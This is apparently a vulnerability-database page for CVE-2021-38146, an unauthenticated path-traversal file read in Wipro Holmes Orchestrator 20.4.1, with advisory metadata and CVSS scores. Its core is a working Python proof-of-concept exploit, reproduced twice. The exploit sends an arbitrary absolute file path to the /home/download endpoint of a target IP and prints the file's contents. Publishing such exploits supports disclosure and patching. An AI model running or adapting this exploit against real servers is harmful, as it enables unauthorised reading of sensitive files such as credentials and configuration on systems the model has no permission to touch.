Wipro Holmes Orchestrator 20.4.1 Arbitrary File Download

2021-11-15T00:00:00

Description

{"id": "PACKETSTORM:164970", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Wipro Holmes Orchestrator 20.4.1 Arbitrary File Download", "description": "", "published": "2021-11-15T00:00:00", "modified": "2021-11-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/164970/Wipro-Holmes-Orchestrator-20.4.1-Arbitrary-File-Download.html", "reporter": "Rizal Muhammed", "references": [], "cvelist": ["CVE-2021-38146"], "immutableFields": [], "lastseen": "2021-11-15T21:42:05", "viewCount": 141, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-38146"]}, {"type": "zdt", "idList": ["1337DAY-ID-37046"]}], "rev": 4}, "score": {"value": 5.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-38146"]}, {"type": "zdt", "idList": ["1337DAY-ID-37046"]}]}, "exploitation": null, "vulnersScore": 5.2}, "sourceHref": "https://packetstormsecurity.com/files/download/164970/wipro-ho-cve2021-38146-poc.py.txt", "sourceData": "`# Exploit Title: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Read PoC \n# Date: 05/08/2021 \n# Exploit Author: Rizal Muhammed @ub3rsick \n# Vendor Homepage: https://www.wipro.com/holmes/ \n# Version: 20.4.1 \n# Tested on: Windows 10 x64 \n# CVE : CVE-2021-38146 \n \nimport requests as rq \nimport argparse \n \nport = 8001 # change port if application is running on different port \n \ndef file_download(host, filepath): \nvuln_url = \"http://%s:%s/home/download\" % (host, port) \ndata = { \n\"SearchString\": filepath, \n\"Msg\": \"\" \n} \n \nhdr = { \n\"content-type\": \"application/json\" \n} \n \nresp = rq.post(vuln_url, headers=hdr, json=data) \n \nprint resp.text \n \ndef main(): \nparser = argparse.ArgumentParser( \ndescription=\"CVE-2021-38146 - Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Download\", \nepilog=\"Vulnerability Discovery and PoC Author - Rizal Muhammed @ub3rsick\" \n) \nparser.add_argument(\"-t\",\"--target-ip\", help=\"IP Address of the target server\", required=True) \nparser.add_argument(\"-f\",\"--file-path\", help=\"Absolute Path of the file to download\", default=\"C:/Windows/Win.ini\") \nargs = parser.parse_args() \n \nif \"\\\\\" in args.file_path: \nfp = args.file_path.replace(\"\\\\\", \"/\") \nelse: \nfp = args.file_path \nfile_download(args.target_ip, fp) \n \nif __name__ == \"__main__\": \nmain() \n`\n", "_state": {"dependencies": 1646401726}}

{"cve": [{"lastseen": "2022-03-23T18:58:24", "description": "The File Download API in Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to read arbitrary files via absolute path traversal in the SearchString JSON field in /home/download POST data.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-22T09:15:00", "type": "cve", "title": "CVE-2021-38146", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38146"], "modified": "2021-11-23T20:04:00", "cpe": ["cpe:/a:wipro:holmes:20.4.1"], "id": "CVE-2021-38146", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38146", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2021-12-04T15:48:11", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-11-15T00:00:00", "type": "zdt", "title": "Wipro Holmes Orchestrator 20.4.1 Arbitrary File Download Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38146"], "modified": "2021-11-15T00:00:00", "id": "1337DAY-ID-37046", "href": "https://0day.today/exploit/description/37046", "sourceData": "# Exploit Title: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Read PoC\n# Exploit Author: Rizal Muhammed @ub3rsick\n# Vendor Homepage: https://www.wipro.com/holmes/\n# Version: 20.4.1\n# Tested on: Windows 10 x64\n# CVE : CVE-2021-38146\n\nimport requests as rq\nimport argparse\n\nport = 8001 # change port if application is running on different port\n\ndef file_download(host, filepath):\n vuln_url = \"http://%s:%s/home/download\" % (host, port)\n data = {\n \"SearchString\": filepath,\n \"Msg\": \"\"\n }\n\n hdr = {\n \"content-type\": \"application/json\"\n }\n\n resp = rq.post(vuln_url, headers=hdr, json=data)\n\n print resp.text\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"CVE-2021-38146 - Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Download\",\n epilog=\"Vulnerability Discovery and PoC Author - Rizal Muhammed @ub3rsick\"\n )\n parser.add_argument(\"-t\",\"--target-ip\", help=\"IP Address of the target server\", required=True)\n parser.add_argument(\"-f\",\"--file-path\", help=\"Absolute Path of the file to download\", default=\"C:/Windows/Win.ini\")\n args = parser.parse_args()\n\n if \"\\\\\" in args.file_path:\n fp = args.file_path.replace(\"\\\\\", \"/\")\n else:\n fp = args.file_path\n file_download(args.target_ip, fp)\n\nif __name__ == \"__main__\":\n main()\n", "sourceHref": "https://0day.today/exploit/37046", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}

Wipro Holmes Orchestrator 20.4.1 Arbitrary File Download

Description

Related